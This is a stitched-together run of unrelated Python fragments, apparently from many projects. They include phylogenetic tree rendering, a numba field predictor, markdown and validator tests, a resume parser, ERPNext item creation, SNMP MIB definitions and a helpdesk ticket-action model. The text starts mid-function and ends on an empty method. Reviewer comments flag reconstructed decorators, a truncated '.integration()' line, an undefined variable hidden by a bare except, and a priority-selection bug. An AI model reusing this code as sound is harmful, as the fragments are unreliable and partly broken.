            spF = TextFace(node.species, fsize=10, fgcolor='#444444', fstyle='italic', ftype='Helvetica')
            add_face_to_node(spF, node, column=0, position='branch-right')
            if hasattr(node, 'genename'):
                geneF = TextFace((' (%s)' % node.genename), fsize=8, fgcolor='#777777', ftype='Helvetica')
                add_face_to_node(geneF, node, column=1, position='branch-right')
    def ly_supports(node):
        # Branch support values above every internal, non-root branch.
        if ((not node.is_leaf) and node.up):
            supFace = TextFace(('%0.2g' % node.support), fsize=7, fgcolor='indianred')
            add_face_to_node(supFace, node, column=0, position='branch-top')
    def ly_tax_labels(node):
        # Colored clade-membership labels in aligned columns; empty faces pad
        # the remaining columns so rows line up.
        if node.is_leaf:
            c = LABEL_START_COL
            largest = 0
            for tname in TRACKED_CLADES:
                if (hasattr(node, 'named_lineage') and (tname in node.named_lineage)):
                    linF = TextFace(tname, fsize=10, fgcolor='white')
                    linF.margin_left = 3
                    linF.margin_right = 2
                    linF.background.color = lin2color[tname]
                    add_face_to_node(linF, node, c, position='aligned')
                    c += 1
            for n in range(c, len(TRACKED_CLADES)):
                add_face_to_node(TextFace('', fsize=10, fgcolor='slategrey'), node, c, position='aligned')
                c += 1
    def ly_full_alg(node):
        # Placeholder layout: full alignment rendering not implemented.
        pass
    def ly_block_alg(node):
        # Draw the leaf's sequence as grey blocks (gaps as lines).
        if node.is_leaf:
            if ('sequence' in node.features):
                # NOTE(review): this first seqFace is immediately rebuilt
                # below with the computed motifs — the assignment is dead.
                seqFace = SeqMotifFace(node.sequence, [])
                motifs = []
                last_lt = None
                # Scan the sequence, emitting one motif per run of
                # non-gap characters.
                for (c, lt) in enumerate(node.sequence):
                    if (lt != '-'):
                        if (last_lt is None):
                            last_lt = c
                        if ((c + 1) == len(node.sequence)):
                            (start, end) = (last_lt, c)
                            motifs.append([start, end, '()', 0, 12, 'slategrey', 'slategrey', None])
                            last_lt = None
                    elif (lt == '-'):
                        if (last_lt is not None):
                            (start, end) = (last_lt, (c - 1))
                            motifs.append([start, end, '()', 0, 12, 'grey', 'slategrey', None])
                            last_lt = None
                seqFace = SeqMotifFace(node.sequence, motifs, gap_format='line', scale_factor=ALG_SCALE)
                add_face_to_node(seqFace, node, ALG_START_COL, aligned=True)
    # Clades highlighted with colored labels in the aligned columns.
    TRACKED_CLADES = ['Eukaryota', 'Viridiplantae', 'Fungi', 'Alveolata', 'Metazoa', 'Stramenopiles', 'Rhodophyta', 'Amoebozoa', 'Crypthophyta', 'Bacteria', 'Alphaproteobacteria', 'Betaproteobacteria', 'Cyanobacteria', 'Gammaproteobacteria']
    colors = random_color(num=len(TRACKED_CLADES), s=0.45)
    lin2color = {ln: colors[i] for (i, ln) in enumerate(TRACKED_CLADES)}
    NAME_FACE = AttrFace('name', fsize=10, fgcolor='#444444')
    LABEL_START_COL = 10
    ALG_START_COL = 40
    ts = TreeStyle()
    ts.draw_aligned_faces_as_table = False
    ts.draw_guiding_lines = False
    ts.show_leaf_name = False
    ts.show_branch_support = False
    ts.layout_fn = [ly_basic, ly_leaf_names, ly_supports, ly_tax_labels]
    # Pre-scan the tree to decide which optional layouts apply.
    MIXED_RES = set()
    MAX_SEQ_LEN = 0
    NPR_TREES = []
    for n in tree.traverse():
        if hasattr(n, 'tree_seqtype'):
            MIXED_RES.add(n.tree_seqtype)
        if hasattr(n, 'tree_type'):
            NPR_TREES.append(n.tree_type)
        seq = getattr(n, 'sequence', '')
        MAX_SEQ_LEN = max(len(seq), MAX_SEQ_LEN)
    if MAX_SEQ_LEN:
        # Scale alignments so the widest one fits into ~1000 px.
        ALG_SCALE = min(1, (1000.0 / MAX_SEQ_LEN))
        ts.layout_fn.append(ly_block_alg)
    if (len(NPR_TREES) > 1):
        rF = RectFace(4, 4, 'steelblue', 'steelblue')
        rF.margin_right = 10
        rF.margin_left = 10
        ts.legend.add_face(rF, 0)
        ts.legend.add_face(TextFace(' NPR node'), 1)
        ts.legend_position = 3
    if (len(MIXED_RES) > 1):
        rF = RectFace(20, 20, '#CFE6CA', '#CFE6CA')
        rF.margin_right = 10
        rF.margin_left = 10
        ts.legend.add_face(rF, 0)
        ts.legend.add_face(TextFace(' Nucleotide based alignment'), 1)
        ts.legend_position = 3
    # Best-effort annotation/rooting; any failure is deliberately swallowed.
    # NOTE(review): `out` is not defined in this function — set_outgroup
    # will raise NameError unless `out` exists at module level; the
    # except below hides that. Confirm this is intended.
    try:
        tree.set_species_naming_function(spname)
        annotate_tree_with_ncbi(tree)
        tree.set_outgroup(out)
        tree.reverse_children()
    except Exception:
        pass
    tree.render(outfile, tree_style=ts, w=170, units='mm', dpi=300)
    tree.render((outfile + '.svg'), tree_style=ts, w=170, units='mm', dpi=300)
    tree.render((outfile + '.pdf'), tree_style=ts, w=170, units='mm', dpi=300)
@numba.jit(nopython=True, parallel=True)
def predict_numba(east, north, force_east, force_north, mindist, forces, result):
    """Fill *result* with the predicted field at each (east, north) point.

    Each prediction is the Green's-function-weighted sum over all point
    forces; the outer loop over observation points is parallelized by numba.

    NOTE(review): the decorator reached review as a bare
    '(nopython=True, parallel=True)' tuple, which is a syntax error; it has
    been restored to the @numba.jit form implied by the numba.prange loop
    below — confirm against the original source.
    """
    for i in numba.prange(east.size):
        result[i] = 0
        for j in range(forces.size):
            green = greens_func_jit((east[i] - force_east[j]), (north[i] - force_north[j]), mindist)
            result[i] += (green * forces[j])
    return result
class TestHighlightAutoTitleMap(util.MdCase):
    """Check that `auto_title_map` overrides the lexer-derived code-block title."""
    extension = ['pymdownx.highlight', 'pymdownx.superfences']
    # Map Pygments' "Python Console Session" lexer name to the shorter "Python".
    extension_configs = {'pymdownx.highlight': {'auto_title': True, 'auto_title_map': {'Python Console Session': 'Python'}}}
    def test_auto_tile_map(self):
        """A pycon fence should be titled "Python" via the title map."""
        self.check_markdown('\n    ```pycon\n    >>> import test\n    ```\n    ', '\n    <div class="highlight"><span class="filename">Python</span><pre><span></span><code><span class="gp">&gt;&gt;&gt; </span><span class="kn">import</span> <span class="nn">test</span>\n    </code></pre></div>\n    ', True)
def get_data_entry(kind, name, default=None, merge=False):
    """Look up the data entry *name* in collection *kind*.

    Entries can be provided by several owners (user settings, plugins,
    climetlab itself).  When more than one owner defines the entry, the
    active ones are ranked by priority and either one is returned or, when
    *merge* is true, their data dicts are merged.  *default* is returned
    when the collection or the name is missing, and also participates in
    owner selection when set.
    """
    # Higher number = higher priority among owners providing the same entry.
    PRIORITIES = {'user-settings': 5, 'plugins': 3, 'climetlab': 2, 'default': 1}
    files = _load_yaml_files()
    if (kind not in files):
        if (default is not None):
            return default
        raise KeyError(("No collection named '%s'" % (kind,)))
    if (name not in files[kind]):
        if (default is not None):
            return default
        raise KeyError(("No object '%s' in collection named '%s' (%s)" % (name, kind, sorted(files[kind].keys()))))
    choices = files[kind][name].choices()
    assert (len(choices) != 0)
    if (len(choices) == 1):
        # Single provider: no arbitration needed.
        return list(choices.values())[0]
    # Capture the call stack so plugin-provided entries only apply when the
    # lookup originates from within that plugin's own source tree.
    frame = inspect.currentframe()
    caller = inspect.getouterframes(frame, 0)
    def is_active(owner, entry):
        # Built-in owners are always active; others (plugins) only when a
        # caller frame lives under the entry's root directory.
        if (owner in PRIORITIES):
            return True
        for c in caller:
            # NOTE(review): assumes entry.root is a string path for
            # non-builtin owners — confirm it can never be None here.
            if c.filename.startswith(entry.root):
                return True
        return False
    if (default is not None):
        choices['default'] = Entry(name='default', kind='default', root=None, path=None, data=default, owner='default')
    choices = {k: v for (k, v) in choices.items() if is_active(k, v)}
    # Sort ascending by priority; unknown owners rank as plugins.
    selected = [v for (_, v) in sorted(choices.items(), key=(lambda x: PRIORITIES.get(x[0], PRIORITIES['plugins'])))]
    if (not merge):
        # NOTE(review): this takes the first element of the ascending sort,
        # i.e. the LOWEST-priority active entry — verify this is intended.
        return selected[0]
    data = merge_dicts(*[v.data for v in selected])
    return Entry(name='merged', kind=kind, root=None, path=None, data=data, owner='merged')
class OptionPlotoptionsHistogramSonification(Options):
    """Sonification options for histogram series (generated Options wrapper)."""

    def contextTracks(self) -> 'OptionPlotoptionsHistogramSonificationContexttracks':
        """Accessor for the nested contextTracks option group."""
        return self._config_sub_data('contextTracks', OptionPlotoptionsHistogramSonificationContexttracks)

    def defaultInstrumentOptions(self) -> 'OptionPlotoptionsHistogramSonificationDefaultinstrumentoptions':
        """Accessor for the nested defaultInstrumentOptions option group."""
        return self._config_sub_data('defaultInstrumentOptions', OptionPlotoptionsHistogramSonificationDefaultinstrumentoptions)

    def defaultSpeechOptions(self) -> 'OptionPlotoptionsHistogramSonificationDefaultspeechoptions':
        """Accessor for the nested defaultSpeechOptions option group."""
        return self._config_sub_data('defaultSpeechOptions', OptionPlotoptionsHistogramSonificationDefaultspeechoptions)

    # NOTE(review): the enabled getter was shadowed by the same-named setter
    # (no decorators); the @property / setter pair has been restored.
    @property
    def enabled(self):
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def pointGrouping(self) -> 'OptionPlotoptionsHistogramSonificationPointgrouping':
        """Accessor for the nested pointGrouping option group."""
        return self._config_sub_data('pointGrouping', OptionPlotoptionsHistogramSonificationPointgrouping)

    def tracks(self) -> 'OptionPlotoptionsHistogramSonificationTracks':
        """Accessor for the nested tracks option group."""
        return self._config_sub_data('tracks', OptionPlotoptionsHistogramSonificationTracks)
def main() -> None:
    """Verify version sorting across all supported public versions.

    Prints the discovered versions, runs the sorting check on each, and
    exits with status 1 when no versions are found or any check fails.
    """
    current_version = get_current_version()
    minimum_version = MINIMUM_VERSION
    # Triple-quoted f-string: the continuation line is intentionally at
    # column 0 so the printed text carries no leading whitespace.
    print(f'''current_version = {current_version!s}
minimum_version = {minimum_version!s}
''')
    versions = get_public_versions(current_version, minimum_version)
    if (not versions):
        print('error: no versions found')
        sys.exit(1)
    versions_str = '\n '.join((str(v) for v in versions))
    print(f'''discovered versions:
 {versions_str}
''')
    failures = check_versions(versions)
    if failures:
        print('Sorting failed in versions:')
        for (version, exc) in failures:
            print(f' {version}: {exc}')
        sys.exit(1)
    else:
        print('success!')
class TestXRIValidator(unittest.TestCase):
    """Behavioural tests for the XRI validator factory."""

    def setUp(self):
        self.validator = validators.XRI

    def test_creation_valid_params(self):
        # Every supported (add_schema, xri_type) combination must construct.
        self.validator()
        for add_schema in (True, False):
            for xri_type in ('i-name', 'i-number'):
                self.validator(add_schema, xri_type)

    def test_creation_invalid_xri(self):
        self.assertRaises(AssertionError, self.validator, True, 'i-something')

    def test_valid_simple_individual_iname_without_type(self):
        checker = self.validator(True, 'i-name')
        self.assertRaises(Invalid, checker.to_python, 'Gustavo')

    def test_valid_iname_with_schema(self):
        checker = self.validator()
        self.assertEqual(checker.to_python('xri://=Gustavo'), 'xri://=Gustavo')

    def test_schema_is_added_if_asked(self):
        checker = self.validator(True)
        self.assertEqual(checker.to_python('=Gustavo'), 'xri://=Gustavo')

    def test_schema_not_added_if_not_asked(self):
        checker = self.validator()
        self.assertEqual(checker.to_python('=Gustavo'), '=Gustavo')

    def test_spaces_are_trimmed(self):
        checker = self.validator()
        self.assertEqual(checker.to_python(' =Gustavo '), '=Gustavo')
class LabelImportResult():
    """Container for the outcome of parsing a label-import file."""
    def __init__(self, format: LabelImportFormat) -> None:
        self.format = format
        # Fingerprint of the account the labels belong to, when present.
        self.account_fingerprint: Optional[str] = None
        # Labels keyed by transaction hash.
        self.transaction_labels: Dict[bytes, str] = {}
        # Labels keyed by key instance id.
        self.key_labels: Dict[int, str] = {}
        # Labels whose target could not be resolved, keyed by raw name.
        self.unknown_labels: Dict[str, str] = {}
@plugin.route('/pansearch/<cid>/<mstr>/<offset>')
def pansearch(cid, mstr, offset):
    """List 115 pan search results for *mstr* inside directory *cid*.

    Prompts for a search string when none is supplied, builds the listing
    (optional M3U8 entry, one entry per file, a next-page entry when more
    results exist), and on API failure notifies the user and re-logs in.

    NOTE(review): this function reached review preceded by a bare
    ('/pansearch/<cid>/<mstr>/<offset>') expression; restored as the
    @plugin.route decorator implied by the plugin.url_for('pansearch', ...)
    self-references below — confirm against the original plugin source.
    """
    if (not mstr) or (mstr == '0'):
        # No search string passed through the route: ask the user.
        mstr = keyboard()
        if not mstr:
            return
    data = getfilelistdata(cid, offset, '0', '0', searchstr=mstr)
    if data['state']:
        imagecount = 0
        items = []
        milkname = '115'
        if str(plugin.get_setting('genm3u8')) == 'true':
            items.append({'label': 'M3U8', 'path': plugin.url_for('m3u8', cid=cid, offset=offset, star='0', name=milkname)})
        for item in data['data']:
            listitem = getListItem(item, mstr)
            if listitem is not None:
                items.append(listitem)
            if 'ms' in item:
                imagecount += 1
        # Add a "next page" entry when the server reports more results.
        if data['count'] > (int(offset) + int(pageitem)):
            items.append({'label': colorize_label('', 'next'), 'path': plugin.url_for('pansearch', cid=cid, mstr=mstr, offset=str((int(offset) + int(pageitem)))), 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'nextpage.png'))})
        # Mostly-image result sets switch the view to thumbnails.
        if (imagecount >= 10) and ((imagecount * 2) > len(items)):
            comm.setViewCode = 'thumbnail'
        return items
    else:
        notify(msg=(',:' + comm.ensure_text(data['error'])))
        login()
        return
def test_new_variable_names(df_vartypes):
    """MathFeatures should honour user-supplied output column names."""
    transformer = MathFeatures(variables=['Age', 'Marks'], func=['sum', 'mean'], new_variables_names=['sum_of_two_vars', 'mean_of_two_vars'])
    X = transformer.fit_transform(df_vartypes)
    # Original columns plus the two renamed derived columns.
    expected = pd.DataFrame.from_dict({'Name': ['tom', 'nick', 'krish', 'jack'], 'City': ['London', 'Manchester', 'Liverpool', 'Bristol'], 'Age': [20, 21, 19, 18], 'Marks': [0.9, 0.8, 0.7, 0.6], 'dob': pd.date_range('2020-02-24', periods=4, freq='T'), 'sum_of_two_vars': [20.9, 21.8, 19.7, 18.6], 'mean_of_two_vars': [10.45, 10.9, 9.85, 9.3]})
    pd.testing.assert_frame_equal(X, expected)
def test_cpa_update_raises_exception_if_traces_or_data_have_improper_types():
    """update() must reject non-array traces/data arguments with TypeError."""
    trace_size, nb_words = 1000, 8
    distinguisher = scared.CPADistinguisher()
    with pytest.raises(TypeError):
        distinguisher.update(traces='foo', data=np.random.randint(0, 1, (trace_size, nb_words), dtype='uint8'))
    with pytest.raises(TypeError):
        distinguisher.update(data='foo', traces=np.random.randint(0, 1, (trace_size, nb_words), dtype='uint8'))
def klippa_resume_parser(original_response: dict) -> ResumeParserDataClass:
    """Convert a raw Klippa resume-parsing response into ResumeParserDataClass.

    Reads `data.parsed` from the provider response and maps the applicant
    block, education, work experience and interests into the standardized
    dataclasses; fields the provider does not supply are set to None/empty.
    """
    response_data = original_response.get('data', {}).get('parsed', {})
    # NOTE(review): 'applicant' is accessed with [] — a response without it
    # raises KeyError; confirm the provider always includes this block.
    applicant = response_data['applicant']
    # --- personal information ---------------------------------------------
    name = ResumePersonalName(raw_name=extract(applicant, ['name', 'value']), first_name=None, last_name=None, middle=None, title=None, prefix=None, sufix=None)
    address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(applicant, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(applicant, ['address', 'city', 'value']))
    # Klippa returns single phone/mail values; wrap them in lists when present.
    phones = extract(applicant, ['phone_number', 'value'])
    mails = extract(applicant, ['email_address', 'value'])
    urls = [website['value'] for website in extract(applicant, ['websites'], []) if website.get('value')]
    personal_infos = ResumePersonalInfo(name=name, address=address, self_summary=None, objective=None, date_of_birth=None, place_of_birth=None, phones=([phones] if phones else []), mails=([mails] if mails else []), urls=urls, fax=[], current_profession=None, gender=None, nationality=None, martial_status=None, current_salary=None)
    # --- education --------------------------------------------------------
    education_entries = []
    for edu in response_data.get('education', []):
        education_address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(edu, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(edu, ['address', 'city', 'value']))
        # The program name doubles as both title and description.
        education_entries.append(ResumeEducationEntry(title=extract(edu, ['program', 'value']), start_date=extract(edu, ['start', 'value']), end_date=extract(edu, ['end', 'value']), location=education_address, establishment=extract(edu, ['institution', 'value']), description=extract(edu, ['program', 'value']), gpa=None, accreditation=None))
    education = ResumeEducation(total_years_education=None, entries=education_entries)
    # --- work experience --------------------------------------------------
    work_experience_entries = []
    for work in response_data.get('work_experience', []):
        work_address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(work, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(work, ['address', 'city', 'value']))
        work_experience_entries.append(ResumeWorkExpEntry(title=extract(work, ['job_title', 'value']), start_date=extract(work, ['start', 'value']), end_date=extract(work, ['end', 'value']), company=extract(work, ['company_name', 'value']), location=work_address, description=None, industry=None))
    work_experience = ResumeWorkExp(total_years_experience=None, entries=work_experience_entries)
    # --- interests --------------------------------------------------------
    interests = []
    for interest in response_data.get('other_interests', []):
        interests.append(ResumeSkill(name=interest.get('value'), type=None))
    extracted_data = ResumeExtractedData(personal_infos=personal_infos, education=education, work_experience=work_experience, languages=[], skills=[], certifications=[], courses=[], publications=[], interests=interests)
    return ResumeParserDataClass(extracted_data=extracted_data)
class CollectionIndexer():
    """Proxy over a selection of graphics within a GraphicCollection.

    Mirrors each GraphicFeature of the selected graphics as an indexable
    CollectionFeature attribute, so setting e.g. ``indexer.<feature> = x``
    fans the value out to every graphic in the selection.
    """
    def __init__(self, parent: GraphicCollection, selection: List[Graphic]):
        # Weak proxy: the indexer must not keep the parent collection alive.
        self._parent = weakref.proxy(parent)
        self._selection = selection
        # Mirror every GraphicFeature found on the first graphic.
        # NOTE(review): assumes all graphics in the collection expose the
        # same feature set as graphics[0] — confirm.
        for attr_name in self._parent.graphics[0].__dict__.keys():
            attr = getattr(self._parent.graphics[0], attr_name)
            if isinstance(attr, GraphicFeature):
                collection_feature = CollectionFeature(self._selection, feature=attr_name)
                collection_feature.__doc__ = f'indexable <{attr_name}> feature for collection'
                setattr(self, attr_name, collection_feature)
    def graphics(self) -> 'tuple[Graphic, ...]':
        # NOTE(review): despite the original ndarray annotation, this
        # returns a tuple of the selected graphics (annotation corrected).
        return tuple(self._selection)
    def __setattr__(self, key, value):
        # Route assignments to existing CollectionFeature attributes through
        # the feature's _set (fan-out) instead of plain rebinding.
        if hasattr(self, key):
            attr = getattr(self, key)
            if isinstance(attr, CollectionFeature):
                attr._set(value)
                return
        super().__setattr__(key, value)
    def __len__(self):
        return len(self._selection)
    def __repr__(self):
        return f'''{self.__class__.__name__} {hex(id(self))}
Selection of <{len(self._selection)}> {self._selection[0].__class__.__name__}'''
def test_daily_log_returns():
    """daily_log_returns on two short series matches the precomputed values.

    (A stray no-op `ret` expression statement — leftover debug output —
    was removed; behavior of the assertions is unchanged.)
    """
    expected = [[0., 0., 0., 0.], [0., 0., 0., 0.]]
    l1 = np.array(range(1, 6)).astype(np.float64)
    l2 = [((10 * 0.2) + (i * 0.25)) for i in range(1, 6)]
    d = {'1': l1, '2': l2}
    df = pd.DataFrame(d)
    ret = daily_log_returns(df)
    # Element-wise comparison with a tight absolute tolerance.
    assert all(abs(ret['1'].values - expected[0]) <= 1e-15)
    assert all(abs(ret['2'].values - expected[1]) <= 1e-15)
def create_item(item_dict, item_details, item_group, center):
    """Create and insert a new ERPNext Item from Zenoti item data.

    *item_dict* is the list-level record, *item_details* the detail-level
    record from the Zenoti API; *item_group* and *center* are the ERPNext
    group and Zenoti center the item is filed under.
    """
    item = frappe.new_doc('Item')
    item.zenoti_item_id = item_details['id']
    # Prefer the detail-level code; fall back to the list entry's code.
    item.zenoti_item_code = (item_details['code'] if ('code' in item_details) else item_dict['code'])
    item.item_name = item_details['name']
    item.item_group = item_group
    item.is_stock_item = 0
    item.include_item_in_manufacturing = 0
    # Only physical products are tracked in stock.
    if (item_group.title() == 'Products'):
        item.is_stock_item = 1
    item.zenoti_item_type = get_zenoti_item_type(item_details)
    item.stock_uom = 'Nos'
    item.zenoti_center = center
    # Optional category/sub-category mappings, resolved per center.
    if item_details.get('category_id'):
        item.zenoti_item_category = get_zenoti_category(item_details.get('category_id'), center)
    if item_details.get('sub_category_id'):
        item.zenoti_item_sub_category = get_zenoti_category(item_details.get('sub_category_id'), center)
    if item_details.get('image_paths'):
        item.image = item_details['image_paths']
    item.insert()
class OptionSeriesScatterStatesSelect(Options):
    """Options for the 'select' state of scatter series.

    NOTE(review): the enabled/lineWidth/lineWidthPlus getters were shadowed
    by their same-named setters (no decorators); the @property / setter
    pairs have been restored. The sub-data accessors are unchanged.
    """

    def animation(self) -> 'OptionSeriesScatterStatesSelectAnimation':
        """Accessor for the nested animation option group."""
        return self._config_sub_data('animation', OptionSeriesScatterStatesSelectAnimation)

    @property
    def enabled(self):
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def halo(self) -> 'OptionSeriesScatterStatesSelectHalo':
        """Accessor for the nested halo option group."""
        return self._config_sub_data('halo', OptionSeriesScatterStatesSelectHalo)

    @property
    def lineWidth(self):
        return self._config_get(None)

    @lineWidth.setter
    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    @property
    def lineWidthPlus(self):
        return self._config_get(1)

    @lineWidthPlus.setter
    def lineWidthPlus(self, num: float):
        self._config(num, js_type=False)

    def marker(self) -> 'OptionSeriesScatterStatesSelectMarker':
        """Accessor for the nested marker option group."""
        return self._config_sub_data('marker', OptionSeriesScatterStatesSelectMarker)
def generate_train_data(input_prefix=DEFAULT_CLUSTER_HEAD_PREFIX, output_prefix=DEFAULT_CLUSTER_PREFIX):
    """Return one hand-labelled coreference example as (text, annotations).

    Spans under ``output_prefix`` are full-mention clusters; spans under
    ``input_prefix`` are the corresponding head-word clusters. Offsets are
    character positions into the sentence.
    """
    text = 'John Smith picked up the red ball and he threw it'
    spans = {
        f'{output_prefix}_1': [(0, 10, 'MENTION'), (38, 40, 'MENTION')],
        f'{output_prefix}_2': [(25, 33, 'MENTION'), (47, 49, 'MENTION')],
        f'{input_prefix}_1': [(5, 10, 'MENTION'), (38, 40, 'MENTION')],
        f'{input_prefix}_2': [(29, 33, 'MENTION'), (47, 49, 'MENTION')],
    }
    return [(text, {'spans': spans})]
# NOTE(review): the decorator line below is truncated in this copy --
# presumably `@pytest.mark.integration()`; confirm against the original.
.integration()
def test_read_dask_pyarrow(complex_dataset_fixture):
    """Read a Foundry dataset into a dask dataframe via pyarrow and inspect it."""
    import dask
    import dask.dataframe as dd
    # Synchronous scheduler keeps the integration test deterministic.
    dask.config.set(scheduler='synchronous')
    df = dd.read_parquet(f'foundry://{complex_dataset_fixture}/', storage_options={'branch': 'master'}, engine='pyarrow')
    unique = df['string_column'].unique().compute()
    print(unique)
    print(df.shape)
def test_ndgrid_2d_derivative(ndgrid_2d_data):
    """Partial derivatives of an ND-grid smoothing spline match the fixture data."""
    xy = ndgrid_2d_data.xy
    z = ndgrid_2d_data.z
    expected_d1 = ndgrid_2d_data.zi_d1
    expected_d2 = ndgrid_2d_data.zi_d2
    spline = csaps.NdGridCubicSmoothingSpline(xy, z, smooth=None).spline
    d1_spline: csaps.NdGridSplinePPForm = spline.derivative(nu=(1, 1))
    d2_spline: csaps.NdGridSplinePPForm = spline.derivative(nu=(2, 2))
    values_d1 = d1_spline(xy)
    values_d2 = d2_spline(xy)
    # Each differentiation drops the polynomial order by one per axis.
    assert d1_spline.order == (3, 3)
    assert d2_spline.order == (2, 2)
    assert values_d1 == pytest.approx(expected_d1)
    assert values_d2 == pytest.approx(expected_d2)
def test_builder() -> None:
    """Incremental updates in 3-byte chunks must yield the full-string digest."""
    chunk_size = 3
    builder = IntegrityBuilder()
    for start in range(0, len(TEST_STRING), chunk_size):
        builder.update(TEST_STRING[start:start + chunk_size])
    result = builder.build()
    assert result.algorithm == 'sha256'
    assert result.digest == TEST_SHA256
class InetAddressIPv6(TextualConvention, OctetString):
    """Auto-generated SNMP textual convention: a 16-octet IPv6 address."""
    status = 'current'
    # Render as eight colon-separated groups of two hex octets.
    displayHint = '2x:2x:2x:2x:2x:2x:2x:2x'
    subtypeSpec = OctetString.subtypeSpec
    # Exactly 16 octets are allowed.
    subtypeSpec += ConstraintsUnion(ValueSizeConstraint(16, 16))
    if mibBuilder.loadTexts:
        description = 'Represents an IPv6 network address: Octets Contents Encoding 1-16 IPv6 address\nnetwork-byte order The corresponding InetAddressType value is ipv6(2). This\ntextual convention SHOULD NOT be used directly in object definitions, as it\nrestricts addresses to a specific format. However, if it is used, it MAY be\nused either on its own or in conjunction with InetAddressType, as a pair.\n'
def Options(optionsList=None, mutable=False):
    """Build a context-options object from (name, default, help-text) tuples.

    Defaults may be overridden through the module-global
    ``contextOptionsString`` (space-separated ``name=value`` pairs whose
    values are parsed with ``ast.literal_eval``). A value of ``'?'`` prints
    the help text and exits the process.

    Returns a mutable dataclass instance when ``mutable`` is True, otherwise
    an immutable namedtuple.
    """
    import ast, sys
    global contextOptionsString
    contextOptionsDict = {}
    help = 'Context input options:\n'
    for optTuple in optionsList:
        help += '{0}[{1}] {2}\n\n'.format(optTuple[0], optTuple[1], optTuple[2])
        contextOptionsDict[optTuple[0]] = optTuple[1]
    logEvent(help)
    if (contextOptionsString == '?'):
        print(help)
        contextOptionsString = None
        sys.exit(0)
    if (contextOptionsString is not None):
        option_overides = contextOptionsString.split(' ')
        for option in option_overides:
            # BUGFIX: split on the first '=' only, so option values may
            # themselves contain '=' (e.g. strings or expressions).
            (lvalue, rvalue) = option.split('=', 1)
            if (lvalue in contextOptionsDict):
                logEvent('Processing context input options from commandline')
                try:
                    contextOptionsDict[lvalue] = ast.literal_eval(rvalue)
                    logEvent(((lvalue + ' = ') + rvalue))
                except Exception:
                    # Narrowed from a bare except; the error is still re-raised.
                    sys.stderr.write('Failed setting context options from command line string.')
                    raise
            else:
                logEvent((('IGNORING CONTEXT OPTION; DECLARE ' + lvalue) + ' IF YOU WANT TO SET IT'))
    if mutable:
        # default_factory binds each current value via a default argument to
        # avoid the late-binding closure pitfall.
        ContextOptions = dataclasses.make_dataclass('ContextOptions', [(k, type(contextOptionsDict[k]), dataclasses.field(default_factory=(lambda x=contextOptionsDict[k]: x))) for k in contextOptionsDict.keys()])
        return ContextOptions(**contextOptionsDict)
    else:
        ContextOptions = namedtuple('ContextOptions', list(contextOptionsDict.keys()))
        return ContextOptions._make(list(contextOptionsDict.values()))
def make_component_logger(configuration: ComponentConfiguration, agent_name: str) -> Optional[logging.Logger]:
    """Create an agent-scoped logger for a component, or None for skills.

    Skills are excluded because the framework injects their logger elsewhere.
    """
    if configuration.component_type == ComponentType.SKILL:
        return None
    name = 'aea.packages.{}.{}.{}'.format(
        configuration.author,
        configuration.component_type.to_plural(),
        configuration.name,
    )
    adapter = AgentLoggerAdapter(get_logger(name, agent_name), agent_name)
    return cast(logging.Logger, adapter)
class FlicketAction(PaginatedAPIMixin, Base):
    """Audit-trail entry recording an action taken on a ticket.

    Known actions: open, assign, claim, status, priority, release, close,
    department_category, subscribe, unsubscribe. ``data`` holds
    action-specific payload (e.g. the new status).
    """
    __tablename__ = 'flicket_ticket_action'
    id = db.Column(db.Integer, primary_key=True)
    ticket_id = db.Column(db.Integer, db.ForeignKey(FlicketTicket.id))
    ticket = db.relationship(FlicketTicket)
    post_id = db.Column(db.Integer, db.ForeignKey(FlicketPost.id))
    post = db.relationship(FlicketPost)
    action = db.Column(db.String(field_size['action_max_length']))
    data = db.Column(db.JSON(none_as_null=True))
    user_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
    user = db.relationship(FlicketUser, foreign_keys=[user_id])
    recipient_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
    recipient = db.relationship(FlicketUser, foreign_keys=[recipient_id])
    date = db.Column(db.DateTime)

    def output_action(self):
        """Return an HTML snippet describing this action.

        Returns None for an unrecognised action name.
        """
        _date = self.date.strftime('%d-%m-%Y %H:%M')
        if (self.action == 'open'):
            return f'Ticket opened by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
        if (self.action == 'assign'):
            return f'Ticket assigned to <a href="mailto:{self.recipient.email}">{self.recipient.name}</a> by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
        if (self.action == 'claim'):
            # typo fix: was "Ticked claimed"
            return f'Ticket claimed by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
        if (self.action == 'status'):
            return f"""Ticket status has been changed to "{self.data['status']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
        if (self.action == 'priority'):
            return f"""Ticket priority has been changed to "{self.data['priority']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
        if (self.action == 'release'):
            return f'Ticket released by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
        if (self.action == 'close'):
            # typo fix: was "Ticked closed"
            return f'Ticket closed by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}'
        if (self.action == 'department_category'):
            return f"""Ticket category has been changed to "{self.data['department_category']}" by <a href="mailto:{self.user.email}">{self.user.name}</a> | {_date}"""
        if (self.action == 'subscribe'):
            return f'<a href="mailto:{self.recipient.email}">{self.recipient.name}</a> has been subscribed to ticket by <a href="mailto:{self.user.email}">{self.user.name}</a>. | {_date}'
        if (self.action == 'unsubscribe'):
            return f'<a href="mailto:{self.recipient.email}">{self.recipient.name}</a> has been un-subscribed from ticket by <a href="mailto:{self.user.email}">{self.user.name}</a>. | {_date}'

    def to_dict(self):
        """Serialise the action for the JSON API, including HATEOAS links."""
